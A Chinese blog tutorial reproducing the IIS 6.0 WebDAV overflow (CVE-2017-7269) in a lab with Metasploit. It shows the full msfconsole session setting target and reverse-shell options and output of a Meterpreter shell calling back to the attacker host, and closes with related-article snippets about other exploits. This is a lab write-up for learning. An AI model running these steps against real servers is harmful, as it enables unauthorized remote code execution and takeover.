Metasploit复现 IIS6.0远程溢出漏洞

最新推荐文章于 2024-07-06 18:31:19 发布
最新推荐文章于 2024-07-06 18:31:19 发布
阅读量3.9k 收藏 3
点赞数 1
分类专栏: 系统漏洞 文章标签: 溢出 代码执行 Metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzxx123520/article/details/79156637
版权

漏洞描述

开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。

漏洞编号

CVE-2017-7269

漏洞等级

高危

影响产品

Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0

漏洞环境搭建

我的环境是windows 2003 R2 Enterprise Edition,安装好IIS 6.0 之后进入服务管理,在管理器中,有一个windows拓展,拓展中有一个webdav选项,该选项默认时禁止状态,右键选择允许就可以了。
这里写图片描述
随后windows+R–>services.msc–>打开webcClient服务,完成配置
这里写图片描述

漏洞测试

攻击机:kali IP :192.168.48.131
受害机:windows2003 IP :192.168.48.146
cve-2017-7269-master.zip
将exp放到
/usr/share/metasploitframework/modules/exploits/windows/iis目录下

msf > search cve-2017-7269

Matching Modules
================

   Name                                                 Disclosure Date  Rank    Description
   ----                                                 ---------------  ----    -----------
   exploit/windows/iis/cve-2017-7269                    2017-03-31       good    CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
   exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual   Microsoft IIS WebDav ScStoragePathFromUrl Overflow


msf > use exploit/windows/iis/cve-2017-7269 
msf exploit(windows/iis/cve-2017-7269) > show options 

Module options (exploit/windows/iis/cve-2017-7269):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HttpHost            localhost        yes       http host for target
   PhysicalPathLength  19               yes       length of physical path for target(include backslash)
   RHOST                                yes       The target address
   RPORT               80               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2


msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.48.146     //设置对方ip
RHOST => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.48.146       //设置对方网站
HttpHost => 192.168.48.146
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp    //设置返回载荷
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.48.131    //设置本机ip
LHOST => 192.168.48.131
msf exploit(windows/iis/cve-2017-7269) > exploit     //溢出

[*] Started reverse TCP handler on 192.168.48.131:4444 
[*] Sending stage (179779 bytes) to 192.168.48.146
[*] Meterpreter session 1 opened (192.168.48.131:4444 -> 192.168.48.146:1043) at 2018-01-24 22:49:23 +0800

meterpreter >

现在可以执行系统命令了
这里写图片描述

c:\windows\system32\inetsrv>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter ��������:

   Connection-specific DNS Suffix  . : localdomain
   IP Address. . . . . . . . . . . . : 192.168.48.146
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.48.2

c:\windows\system32\inetsrv>

参考资料

CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit

土豆回锅
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
IIS 6.0 远程溢出漏洞
瞎几把学
03-20 4675
<br />Oday摘要: 发布日期:2010-10.03发布作者:FoXHaCkEr影响版本:IIS6.0官方地址:Microsoft漏洞类型:远程溢出漏洞描述:微软IIS6.0一个远程溢出漏洞代码exp:#!/usr/bin/perl#*********!!!WARNING!!!*********#*FORSECURITYTESTiNGONLY!*#***********************************#  <br /><br />发布日期:2010-10.03<br />发布作者:Fo
CVE-2017-7269-iis远程溢出漏洞复现
PANDA墨森的博客
06-19 643
##01漏洞描述 cve_2017_7269漏洞属于高危漏洞,是由Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)发现的。IIS 6.0开启Webdav服务的服务器被爆存在缓存区溢出漏洞导致远程代码随意执行,目前针对 Windows Server 2003 R2 可以稳定利用。 下面开始复现cve_2017_7269漏洞,拿下windows 2003 R2权限,并远程登录服务器: ##02靶机实验环境 目标主机:Windows Server 2..
iis7.0解析漏洞/iis6.0解析漏洞-新手黑客记录贴
最新发布
2401_84915584的博客
07-06 595
一、IIS简介IIS 是 Internet Information Services 的缩写,意为互联网信息服务
metasploit iis6.0溢出远程代码执行漏洞
cs_xiaoqiang的博客
01-23 1276
目标ip:192.168.0.106  本机ip:192.168.0.105 下载这次的exp:cve-2017-7269 将exp复制到/usr/share/metasploit-framework/modules/exploits/windows/iis目录下。(添加到metasploit 里面) 接下来打开metasploit 搜索exp
赛门铁克远程溢出exp
weixin_34281477的博客
04-15 73
印象中好像是赛门铁克第二次出远程溢出漏洞了。。。那些企业sep用户可能会有些影响。脆弱的内网安全啊 ***代码如下 赛门铁克远程溢出exp # # # # # # # # # # # # # # # # # # # # # # # # # ### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE ### REMOTE SYS...
(CVE-2017-7269)IIS6.0远程代码执行漏洞
bring_coco的博客
03-04 740
一.漏洞介绍 IIS6.0在Web服务扩展中开启WebDAV,webDAV服务存在缓冲区溢出漏洞,造成远程代码执行 二.漏洞影响 Windows Server 2003 三.复现过程 环境:kali(10.0.78.19) Windows Server 2003(10.0.78.20) 1.打开Windows Server 2003中IIS的WebDAV 2.下载EXP 下载网址:https://github.com/zcgonvh/cve-2017-7269 将EXP复制到kali的/usr/share
IIS6.0漏洞之CVE-2017-7269 远程代码执行漏洞复现及Poc验证
7Riven's blog
12-06 3844
漏洞描述 CVE-2017-7269:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行 漏洞产生的原因 在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,在IIS 6.0处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行memcpy对...
CVE-2017-7269 IIS6.0远程代码执行漏洞复现
gp1531620582的博客
06-15 4322
漏洞概况:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞远程攻击者通过以“If: &lt;http://”开头的长header PROPFIND请求,执行任意代码。目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。漏洞复现靶机环境:...
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
热门推荐
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
远程exp_Windows TCP/IP远程代码执行漏洞(CVE202016898)
weixin_36397104的博客
01-14 582
漏洞信息CVE编号:CVE-2020-16898漏洞名称:Windows TCP/IP远程代码执行漏洞漏洞描述:当Windows TCP/IP堆栈不正确地处理递归DNS服务器选项,且长度字段值为偶数的ICMPv6路由器广告数据包时,存在一个远程代码执行漏洞。服务器选项长度以8个字节为增量进行计数,长度为3的RDNSS选项总长度应为24个字节。该选项本身包含五个字段:IPv6递归DNS服务...
metasploitable2靶场渗透
weixin_45349299的博客
02-13 418
title: metasploitable2靶场渗透 date: 2023-2-13 9 :16 :35 tags: vulhub categories: 渗透从入门到入土 author:Abyssaler
iis6.0渗透实战笔记
weixin_42345596的博客
05-31 1753
IIS IIS从1.0-10.0之间共有12个版本,1.0-4.0已基本退出市场,6.0-10.0居多。IIS7.5、IIS8.5以及IIS10.0、IIS6.0是目前使用最多的版本. IIS版本对应的Windows系统版本如下: IIS6.x渗透 准备环境:Windows server 2003 IP:192.168.173.194 接下来先搭环境 双击这里,进去之后点确定,默认选中的那三个,接着点击确定 点击下一步之后,出现了报错,这代表操作系统无法找到可用的iis6.0安装包,这里把
iis php cgi.exe 漏洞,IIS的FastCGI漏洞处理方法
weixin_31360095的博客
03-16 180
原标题:IIS的FastCGI漏洞处理方法FastCGI解析漏洞 WebServer Fastcgi配置不当,会造成其他文件(例如css,js,jpg等静态文件)被当成php脚本解析执行。当用户将恶意脚本webshell改为静态文件上传到webserver传递给后端php解析执行后,会让攻击者获得服务器的操作权限 高风险项漏洞地址(URL) 参数 请求方法 发现时间 恢复时间 持续时间GET 7月...
IIS6远程执行漏洞复现
weixin_53696027的博客
03-01 519
通过自己搭建靶场复现IIS远程命令执行漏洞
IIS解析漏洞
cyynid的博客
02-28 950
在开启WebDav扩展的服务器后,如果支持PUT、Move、Copy、Delete等方法,就可能会存在一些安全隐患,比如www.secbug.org服务器(IIS 6.0 Web容器)支持WebDav,并且存在PUT、Move、Copy、Delete等方法,那么攻击者就可能通过PUT方法向服务器上传危险脚本文件,测试步骤如下。例如:建立文件夹 parsing.asp,在 parsing.asp 文件夹内新建一个文本文档 test.txt,其内容为,然后在浏览器内访问。
IIS .ASP文件缓冲区溢出漏洞
shaily读书学习
05-06 1743
涉及程序: ASP   描述: IIS .ASP文件缓冲区溢出漏洞   详细: 在Microsoft IIS 4.0的.ASP ISAPI文件解析机制中存在一个缓冲区溢出漏洞,利用该漏洞将可以获得SYSTEM水平的访问权限。 该漏洞是一个本地漏洞,但如果攻击者可以上传.acp文件,它将被远程利用。 在对Java Script中"LANGUAGE"变量的处理中,如果提供一个超长的字符串给"LANGU
CVE2017-7269 IIS6.0利用MSF远程溢出漏洞提权
404
01-22 5360
漏洞编号:CVE2017-7269 服务器版本:Windows server 2003 中间件:IIS6.0 攻击工具:metasploit POC:CVE2017-7269.rb 靶机IP:192.168.1.175 攻击机IP:192.168.1.195 本地漏洞复现过程,安装windows server 2003 r2 开启IIS服务 利用poc: require '
IIS6.0 CVE-2017-7269漏洞远程利用与本地提权详解
"本文主要介绍如何利用IIS6.0中的CVE-2017-7269漏洞进行远程利用和本地提权,以及在过程中可能遇到的常见问题。" 在网络安全领域,IIS (Internet Information Services) 是微软公司提供的一个用于Windows操作系统的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值